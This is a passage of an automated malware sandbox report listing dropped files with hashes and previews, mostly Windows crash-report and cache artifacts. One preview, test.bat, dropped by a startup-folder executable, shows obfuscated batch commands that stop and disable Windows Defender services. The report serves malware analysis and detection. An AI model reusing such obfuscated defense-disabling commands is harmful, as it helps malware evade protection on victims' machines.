                                                                                                                  15:21:51API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                  15:21:55API Interceptor137x Sleep call for process: aspnet_compiler.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASN

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4096
                                                                                                                  Entropy (8bit):0.597889115294713
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:0FgLgk1GaD0JOCEfMuaaD0JOCEfMKQmDd+JtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0APGaD0JcaaD0JwQQdmtAg/0bjSQJ
                                                                                                                  MD5:9AE4A5B8574F3175E725DF00EF2BCCCC
                                                                                                                  SHA1:52BD0FFA1BD5ED0F9C952EE1FCFA2A206FF596D4
                                                                                                                  SHA-256:80802285C72FB0CE935A0E6596C341CEE5928BDB4220240CF93932E384BE1BCD
                                                                                                                  SHA-512:A35AB50A730391A5E6D3D7D0D0DF198EC7C97FF5C91994996EB4F924EECE67D2D39081317DB19D195C6583D224480CCC6BC66FB5BDD61D5E5498CA6C1DF90A34
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ......:{..(....."....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................."....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x17166b1a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32768
                                                                                                                  Entropy (8bit):0.09472530939958232
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Mzwl/+U90HsRIE11Y8TRXo8asHXqKSzwl/+U90HsRIE11Y8TRXo8asHXqK:M0+UWMO4bl+sH6KS0+UWMO4bl+sH6K
                                                                                                                  MD5:9CFDA737FCE78F047B1C6B9F28FE6BB4
                                                                                                                  SHA1:D87C7A73033D63F0C64EAD4A5B1E65A505263BEF
                                                                                                                  SHA-256:B46F1E6F00B194E503BA0AB82A80CE3AF9CB3392CCB7AE76B65BCEE5B65726CC
                                                                                                                  SHA-512:9E719990FED79A33B3C2BABF3D2A213536762DC3509803FCB6932558ADEE2D9A7D0C65F44E441D034FBE8F2B0C04357D434EEE7F8131A5B2C640946D88AC99DC
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ..k.... ................e.f.3...w........................&..........w..#....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................D..G#....y..................b...#....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8192
                                                                                                                  Entropy (8bit):0.10885277311932687
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:cKll9EvG1XFkl7l/bJdAtiX///all:c+lYG11kl7t4IXG
                                                                                                                  MD5:18BC9A7B14851DC930A11663A65F23DE
                                                                                                                  SHA1:F8F5D5964D1495CB1A95E0C056DAD18AC5690709
                                                                                                                  SHA-256:D43DC4F6F56B808BEBD1F473F890D6DDEAF4EC3D000368E45E3F40A69B411FE4
                                                                                                                  SHA-512:BDFF1533834048D08BC95718B70628FBB08B45190C3FA299E24F9F7B837C8F646D03BA4D87CDFE211CD15640141E263FA92BDE75F6C3C9D6A9C49C6D571D21BC
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: DQ.......................................3...w..#....y.......w...............w.......w....:O.....w..................b...#....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VknMvPoCXZ.exe_64eaf576c345d5342863ccd8192529db1bd52c80_e2466c59_0f48ed99\Report.wer
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16762
                                                                                                                  Entropy (8bit):3.7630351978974383
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:uW+eN7erHigKnaKeCiAKmYNetK/u7scS274ItWc0:x+eN7KigKnaHCK/u7scX4ItWH
                                                                                                                  MD5:56DEE45DDDD24DA9F5C50B4938CCCA83
                                                                                                                  SHA1:0A5776C80B3B30621DFE9E0861E6215ED9ECC5F9
                                                                                                                  SHA-256:D024A71478BE90E3FAA55C365B2BB9BDDCF153B121D869B6DB68004FFEF47653
                                                                                                                  SHA-512:7AC3B35511B2D91F3279F01DEC6C7B9C1FF1D88323F50E30F3DD80A76F04D65F25041C97B85D6586C7D1711020B05EBEDF7D966D6AF035E1247AA370669C48B0
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.8.0.8.3.5.7.5.8.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.8.0.9.1.4.6.6.4.2.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.5.6.3.5.7.a.-.5.4.3.6.-.4.c.f.7.-.b.f.e.6.-.1.1.3.1.a.c.7.a.0.b.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.c.b.1.4.7.a.-.f.1.8.f.-.4.a.d.9.-.b.0.2.a.-.f.4.d.7.5.8.1.0.6.b.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.k.n.M.v.P.o.C.X.Z...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...V.i.s.u.a.l.S.t.u.d.i.o...D.e.v.O.p.s...T.e.l.e.m.e.t.r.y...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.4.-.0.0.0.1.-.0.0.1.6.-.0.5.a.3.-.3.8.e.2.7.f.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.5.c.3.8.c.5.4.b.0.c.b.4.7.3.d.2.e.1.4.5.f.0.8.a.5.c.e.5.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.4.d.d.
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC744.tmp.dmp
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 22:21:25 2021, 0x1205a4 type
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):379871
                                                                                                                  Entropy (8bit):4.1539889535685806
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:5rbJyOk9gIOgF5c50GfSUCgUNrvoDDMeBBRAMoXnmGH+fak3b20Pjd+pr90Mt:5JyD9RpD+YTj0buMq5+Db20IpH
                                                                                                                  MD5:A92EFD02DB32AE17F78DE3FD09CE5CE6
                                                                                                                  SHA1:1F2122F65414870C23C52873D1C3140E70198C14
                                                                                                                  SHA-256:A91332A2E8F3ADB08FFBBCDB60109CA458149EC57E7C11D4549C10D44666D49C
                                                                                                                  SHA-512:07D1B6F5E97760D4BDC5CD15952C16226BF268A6B7680CCC2C5E1D1E6BB40F4D05A87E5A4A06F420682B8112384124DB1D5CA8EC5DC51204D4C916DD05454B7C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MDMP....... ........qBa...................U...........B.......,......GenuineIntelW...........T............qBa.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA60.tmp.WERInternalMetadata.xml
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8422
                                                                                                                  Entropy (8bit):3.698682703520275
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Rrl7r3GLNiH86k6YIMSULMYegmfZfSKaCprD89bnNsfENm:RrlsNic6k6YjSULMYegmfxSKWnGfD
                                                                                                                  MD5:DDF24E91AC42E380463C5B998CDAF1FB
                                                                                                                  SHA1:00F83BCEA6D49CEA8A76371CAA540D21B57E98E9
                                                                                                                  SHA-256:56E7DD32B70B9A1DFFFB9C0CCCC0EE9CA96C3A9559F291A16215CD2A17C4AFCD
                                                                                                                  SHA-512:FD40E7099C360EF29774AE3006E3E2F9272DFC6EC27E7A2A30965D31493AFA0A4383ED684074506C46268D043457DA864962CD0CC048E308BF06258A3EA01117
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.4.<./.P.i.d.>.......
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC26.tmp.xml
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4788
                                                                                                                  Entropy (8bit):4.498039358519405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:cvIwSD8zs/JgtWI9IGWSC8BgM8fm8M4JeHOVQ1FX+q8vMOVQ9MJd7Y0rhy002Qd:uITfhvHSNsJD4KNVv1rd0Hd
                                                                                                                  MD5:9F0F8A48808420FC92684FB96C2B2C58
                                                                                                                  SHA1:1F92A2A8387E9571C94611877F2843E0433E9CB2
                                                                                                                  SHA-256:703502C9BF6DDB6CC27D2E79C5274D30E6754F91E488FAF649E2A797EE2E950E
                                                                                                                  SHA-512:758A364395405757FCE88E62E2740883DA68B3957B71FE111A8134273CF90CE96B6B7266D04B4564B9DBE87242CE3503B07B47AC9D795FAE25E491F986E0B729
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168292" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC53.tmp.csv
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):54636
                                                                                                                  Entropy (8bit):3.073026398744777
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:QshHfvCPrkT6a227idJ4dPGYnVoBHKjv8QB604kZh:QshHfvCPrkT6a227idJ4dPGYnVUHKjv3
                                                                                                                  MD5:11787EC20E9E1501D0C0DA787B1EEF07
                                                                                                                  SHA1:F9FB5015673B24B0F13BD914C0ECED8A0236239B
                                                                                                                  SHA-256:448CEFD0E0ADF340D53244B813693DFA017B0A831570530B211B413794787A55
                                                                                                                  SHA-512:03FD4B185EED29A019B98C75D3986BDABA776F4E4F965A4B0B47FE94F03CAFEBF7882A0E2B96001158C78691626E388BF794755DACF09D1396436E20AC0813F5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE424.tmp.txt
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):13340
                                                                                                                  Entropy (8bit):2.6963291623570638
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:9GiZYWgSVDwGFhYGYjZWVx6HaUYEZMJtribjZJiwwqAAla8Xc843tIv73:9jZDg0zBBxNF+a8Xc84iv73
                                                                                                                  MD5:124B52EE4688EF5F20BDB5636985282E
                                                                                                                  SHA1:4F4FBB4016164AFCB12847E675FD0EC14612F379
                                                                                                                  SHA-256:850300B2AFBC3D7AD0D7071BE1DE9EDDEB810A49E1693CCB29D43F985CF8562F
                                                                                                                  SHA-512:6865D19FC4BC00413CF5F97B3203D963DE6A504E61AB22E20C0665F94D182B0FDC070DA50882F4AFE0B1D0BA54E22FA42F8D97F7E451C98AEF6EB108553FF8FA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14734
                                                                                                                  Entropy (8bit):4.993014478972177
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                  MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                  SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                  SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                  SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):21612
                                                                                                                  Entropy (8bit):5.600891430343444
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ctL6Rq0vKcoo0ClK7i3n3IS0nEjultICspE93Uu16zC5maxHVs3QSKj6I8I++jd:CoLYTEClt4wuCUCaQPmlQ
                                                                                                                  MD5:09C404B27F5292390D39AF53E7C6A6E4
                                                                                                                  SHA1:B4218A4F9A11BE3E29B053656B8FE1FB6CE54574
                                                                                                                  SHA-256:4A7D019EAB126BF9971DD10C6E47658407A986EF25294A87BA2C3BB4104F7706
                                                                                                                  SHA-512:4A85E798C11A0C4595CF3B42EA064F6F25E916877C39729E9FC6B518FDF4CF2AA843EBE6B9A3A79A30AE1561ED29DB6B2DA212C61AC01E8E08BA517015977511
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @...e...................h.?.(.".x.....c...I..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                                  C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dzsxkm1.gmw.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k00wotq.d3h.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
